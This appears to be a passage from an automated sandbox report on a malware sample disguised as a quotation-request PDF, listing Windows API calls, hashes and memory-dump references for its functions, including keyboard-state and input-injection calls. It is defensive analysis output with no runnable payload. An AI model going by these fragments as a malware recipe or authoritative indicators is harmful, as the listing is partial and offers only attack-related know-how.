                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Enable$Show$FocusMessageSend
                                                                    • String ID:
                                                                    • API String ID: 3429747543-0
                                                                    • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                    • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                    • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                    • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                    • __swprintf.LIBCMT ref: 0045D4E9
                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                    • String ID: %lu$\VH
                                                                    • API String ID: 3164766367-2432546070
                                                                    • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                    • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                    • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                    • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                    • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                    • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: Msctls_Progress32
                                                                    • API String ID: 3850602802-3636473452
                                                                    • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                    • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                    • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                    • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                    • String ID:
                                                                    • API String ID: 3985565216-0
                                                                    • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                    • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                    • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                    • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                    APIs
                                                                    • _malloc.LIBCMT ref: 0041F707
                                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                    • _free.LIBCMT ref: 0041F71A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free_malloc
                                                                    • String ID: [B
                                                                    • API String ID: 1020059152-632041663
                                                                    • Opcode ID: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                                    • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                    • Opcode Fuzzy Hash: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                                    • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                    APIs
                                                                      • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                      • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                    • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                    • String ID:
                                                                    • API String ID: 1957940570-0
                                                                    • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                    • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                    • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                    • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 004302E6
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                    • GetClientRect.USER32(?,?), ref: 00430364
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                    • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                    • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                    • String ID:
                                                                    • API String ID: 3220332590-0
                                                                    • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                    • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                    • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                    • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                    • String ID:
                                                                    • API String ID: 1612042205-0
                                                                    • Opcode ID: 00515ba70b49e7e079554eab0ba48c1405c4c8c1eac40979e81de5179a93b954
                                                                    • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                    • Opcode Fuzzy Hash: 00515ba70b49e7e079554eab0ba48c1405c4c8c1eac40979e81de5179a93b954
                                                                    • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove_strncmp
                                                                    • String ID: >$U$\
                                                                    • API String ID: 2666721431-237099441
                                                                    • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                    • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                    • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                    • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 0044C570
                                                                    • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                    • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                    • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                    • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                    • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$InputSend
                                                                    • String ID:
                                                                    • API String ID: 2221674350-0
                                                                    • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                    • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                    • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                    • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$_wcscat
                                                                    • String ID:
                                                                    • API String ID: 2037614760-0
                                                                    • Opcode ID: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
                                                                    • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                    • Opcode Fuzzy Hash: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
                                                                    • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                    • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                    • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                    • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Copy$AllocClearErrorLastString
                                                                    • String ID:
                                                                    • API String ID: 960795272-0
                                                                    • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                    • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                    • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                    • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                    APIs
                                                                    • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                    • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                    • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                    • EndPaint.USER32(?,?), ref: 00447D13
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                    • String ID:
                                                                    • API String ID: 4189319755-0
                                                                    • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                    • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                    • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                    • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                    • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                    • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow$InvalidateRect
                                                                    • String ID:
                                                                    • API String ID: 1976402638-0
                                                                    • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                    • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                    • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                    • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                    APIs
                                                                    • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                    • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                    • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                    • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                    • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 642888154-0
                                                                    • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                    • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                    • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                    • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
